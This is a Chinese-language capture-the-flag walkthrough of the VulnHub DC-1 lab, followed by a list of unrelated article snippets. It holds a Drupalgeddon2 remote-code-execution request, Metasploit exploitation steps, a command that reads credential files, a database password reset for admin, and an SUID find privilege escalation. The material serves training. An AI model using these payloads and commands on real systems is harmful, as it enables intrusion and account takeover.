vulnhub系列:DC-1

news2024/9/22 1:29:09

vulnhub系列:DC-1

靶机下载

一、信息收集

nmap 扫描存活,根据 mac 地址寻找 IP

nmap 192.168.23.0/24

nmap扫描网段

nmap 扫描端口

nmap 192.168.23.141 -p- -Pn -sV -O

nmap扫描端口

dirsearch 目录扫描

python3 dirsearch.py -u http://192.168.23.141/

目录扫描

访问80端口

80页面

查看 wappalyzer 插件信息

wappalyzer

目前基本信息

IP地址:192.168.23.141
开放端口:22、80、111、37573
Drupal 7
php 5.4.45
jQuery 1.4.4

直接搜索 Drupal 的漏洞

搜索Drupal漏洞

根据文章给出的POC尝试远程代码执行

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.23.141
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=dir

远程代码执行POC1

试着换了几个命令好像没有执行

找找目录扫描扫出来的文件或目录

发现一个token字段

theme和token

账号注册等功能的页面

账号注册等页面

二、getshell

没找到啥东西,kali 使用工具

msfconsole

msf

查找 Drupal 的 exp

search Drupal

查找exp

利用漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

use18年漏洞

查看漏洞模块参数

options

查看漏洞模块参数

可以看到 rhosts 需要填写,设置 rhosts 内容,然后查看模块

set rhosts 192.168.23.141

show options

设置被攻击IP后查看模块

设置好后攻击

run或者exploit

成功连接

run成功连接

输入 shell,执行命令

shell

shell执行命令

使用 python,提升交互性

python -c 'import pty; pty.spawn("/bin/bash")'

获取交互式shell

flag 1

查看当前目录,发现 flag1.txt,提示有一个配置文件

image-20240812191033661

flag 2

文档给出的配置文件名为 settings.php,搜索文件

cat `find / -name settings.php`

翻了翻看到 flag 2 和数据库账号密码,flag 2 提示,暴力破解和字典攻击不是唯一方法,需要访问权限,能用这些证书做什么?

dbuser:R0ck3t

setting文件得到数据库账号密码

连接数据库

mysql -u dbuser -pR0ck3t

连接数据库

进入数据库查看以下数据

show databases;

查看库名

查看 drupaldb 库下表名

use drupaldb;
show tables;

查看表名

可以看到有一个 users 表,查看一下其下数据

select * from users;

账号密码

发现 admin 和 Fred 用户,密码经过加密,update 修改密码

update users set pass=123456 where name="admin";

修改密码

页面尝试登录,登录失败,可能需要同样的加密方式

登录被限制

百度一下怎么做

image-20240812192352469

这里我用方法二,执行命令

php scripts/password-hash.sh admin

$S$D65v3m6Cw02rYa9zUwTmjtFHWy5OEneOVUyXMBjs5AxfiiNXgkYU

image-20240812193243240

得到密码 admin 的 hash 值,进入数据库修改密码

mysql -u dbuser -pR0ck3t

use drupaldb;

update users set pass="$S$D65v3m6Cw02rYa9zUwTmjtFHWy5OEneOVUyXMBjs5AxfiiNXgkYU" where name="admin";

image-20240812193440056

重新登录80端口页面,登录成功

admin:admin

image-20240812194029860

flag 3

在图中位置发现 flag 3,特殊的 PERMS 能帮我找到密码,提示 -exec,应该是要 suid 提权

image-20240812193916970

image-20240812193939469

三、提权

查看 suid 权限的可执行程序

find / -perm -4000 2>/dev/null

image-20240812194451524

依次寻找测试,find 可利用,提权成功

find / -name flag1.txt -exec "/bin/bash" -p \; -quit

image-20240812195458173

在 root 目录下发现 thefinalflag.txt ,查看内容

image-20240812195644617

flag 4

在 home 目录下发现 flag4.txt

image-20240812200105405

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2047409.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数据资产三次入表理论

数据资产三次入表理论 数据资产入表三大阶段详见图。 初次入表:底层资产入表 初次入表主要指的是企业将已实际形成的底层原始数据资源,按照《企业数据资源相关会计处理暂行规定》的要求,首次纳入会计层面的企业资产库。这一阶段工作的完成&am…

8.16 day bug

bug1 题目没看仔细 额外知识 在 Bash shell 中,! 符号用于历史扩展功能。当你在命令行中输入 ! 后跟一些文本时,Bash 会尝试从你的命令历史中查找与该文本相匹配的命令。这是一种快速重用之前执行过的命令的方法。 如何使用历史扩展 基本用法: !strin…

进程间通信—无名管道

gg shiftg快速对齐 加锁顺序问题时,如果解锁了,两个同时申请抢锁,谁抢到了运行谁,循环迭代时释放锁也是同时申请锁,循环部分如果没抢到锁就进入循环等待 总结: IPC 进程间通信 interprocess communicate //signal…

【阿卡迈防护分析】Vueling航空Akamai破盾实战

文章目录 1. 写在前面2. 风控分析3. 破盾实战 【🏠作者主页】:吴秋霖 【💼作者介绍】:擅长爬虫与JS加密逆向分析!Python领域优质创作者、CSDN博客专家、阿里云博客专家、华为云享专家。一路走来长期坚守并致力于Python…

Elasticsearch新增和删除索引中的字段

在ES中,增加字段相对比较容易,因为ES支持动态映射(Dynamic Mapping)。 当索引中新增文档时,ES可以根据文档中的字段自动创建对应的映射关系。如果新字段类型与已有字段类型不同,ES会自动将已有字段类型转换…

2024-2025年最值得选的Java计算机毕业设计选题大全:800个热门选题

一、前言 博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ…

选择排序(附动图)

1.思路 基本思想: 每一次从待排序的数据元素中选出最小(或最大)的一个元素,存放在序列的起始位置,直到全部待排序的数据元素排完 。 1.1双向选择排序(升序) 头尾指针(索引&#xf…

Excel求和方法之

一 SUM(),选择要相加的数,回车即可 二 上面的方法还不够快。用下面这个 就成功了 三 还有一种一样快的 选中之后,按下Alt键和键(即Alt)

三种生成模型

三种生成模型(GAN,VAE,FLOW) 什么是生成模型? 图像、文本、语音等数据,都可以看做是从一个复杂分布中采样得到的。 一个简单的分布随机分布,经过一系列复杂的变换(Generator)之后变成复杂分布. 从简单分布中随机采样一个z,经过G后…

新版本源2.0大模型发布:Yuan2-2B-July-hf

​ 引言 近日,浪潮信息的新一代基础语言大模型源2.0 迎来了重要更新。浪潮信息正式发布了 Yuan2-2B-July-hf 模型,标志着源2.0系列模型在性能和功能上的进一步提升。这一版本将为开发者和研究人员提供更强大的工具,以满足各种语言处理需求。…

武汉流星汇聚:携手亚马逊,全球电商中破浪前行,跨境业务加速崛起

在全球电商的浩瀚星空中,亚马逊无疑是最耀眼的星辰之一,其无与伦比的市场规模、卓越的用户体验以及强大的品牌影响力,为全球卖家铺设了一条通往成功的康庄大道。而在这条道路上,武汉流星汇聚电子商务有限公司作为一颗迅速崛起的新…

libnl教程(1):订阅内核的netlink广播通知

文章目录 前言目标netlink kernel multicast notifications订阅内核的链路(link)变化通知示例代码函数使用难点问题 前言 我之前整理过:netlink 简介。 netlink 是 libnl 的基础。 在开始之前,需要先翻看一遍官方文档:Netlink Library (li…

centos从home分区分配空间到根分区

在安装centos系统时如果采用默认自动分区,则会默认只给根分区分配50G空间,其余多余的会被分配到home分区,而作为家用服务器或仅个人使用的话,为了方便往往根分区会不够用而home分区几乎没使用。 先看下现在的磁盘结构和容量(xfs文…

第八篇 WAV文件格式

WAVE PCM soundfile format WAV即WAVE,WAVE文件是计算机领域最常用的数字化声音文件格式之一,它是微软专门为Windows系统定义的波形文件格式(Waveform Audio),其扩展名为"*.wav"。 最基本的WAVE文件…

【Linux】进程概念的铺垫

进程概念的铺垫 先谈硬件——冯诺依曼体系结构冯诺依曼体系结构的5大部件输入输出设备存储器中央处理器(CPU) 冯诺依曼体系结构示意图 再谈软件——操作系统操作系统的 目的 和 定位如何理解 "管理"总结系统调用 - system call 先谈硬件——冯…

LINUX原始机安装JDK

文章目录 下载 JDK压缩包创建jdk文件夹sftp 远程上传解压缩 tar -zxvf 包名配置环境变量刷新 环境变量验证是否安装成功安装JAVA 依赖yum更新及替换镜像curl 命令下载更新更新yum依赖判断repo文件是否存在生成缓存、启用阿里云镜像 重新下载java依赖再次验证hello world 下载 J…

Java | Leetcode Java题解之第341题扁平化嵌套列表迭代器

题目&#xff1a; 题解&#xff1a; public class NestedIterator implements Iterator<Integer> {private List<Integer> vals;private Iterator<Integer> cur;public NestedIterator(List<NestedInteger> nestedList) {vals new ArrayList<Inte…

用数据分析找到神奇公式-《股市稳赚》读后感

格林布拉特的这本书介绍了一种简单的方法&#xff0c;核心是用神奇公式寻找到高资本收益率和高股票收益率的最佳投资组合。作者对其背后原理的普遍性充满自信&#xff0c;神奇公式寻找经营良好且价格低于平均水平的公司&#xff0c;买进质优价低的公司&#xff0c;这个公式&…

C++ 设计模式——简单工厂模式

简单工厂模式 简单工厂模式主要组成部分代码实现简单工厂模式模式的 UML 图UML图解析类与方法优点和缺点适用场景 简单工厂模式 简单工厂模式是一种创建型设计模式&#xff0c;通过一个工厂类来负责对象的实例。这种模式将对象创建的细节封装在工厂类中&#xff0c;客户端无需…

掌握JavaScript中的Call和Apply,让你的代码更强大、更灵活

在学习JavaScript时&#xff0c;你可能会遇到call和apply这两个方法。它们的作用其实很相似&#xff0c;都是用来调用函数并设置函数内部的this值&#xff0c;但它们的使用方式稍有不同。 想象一下&#xff0c;你和朋友们一起拍照。call就像是你一一叫朋友们的名字&#xff0c;…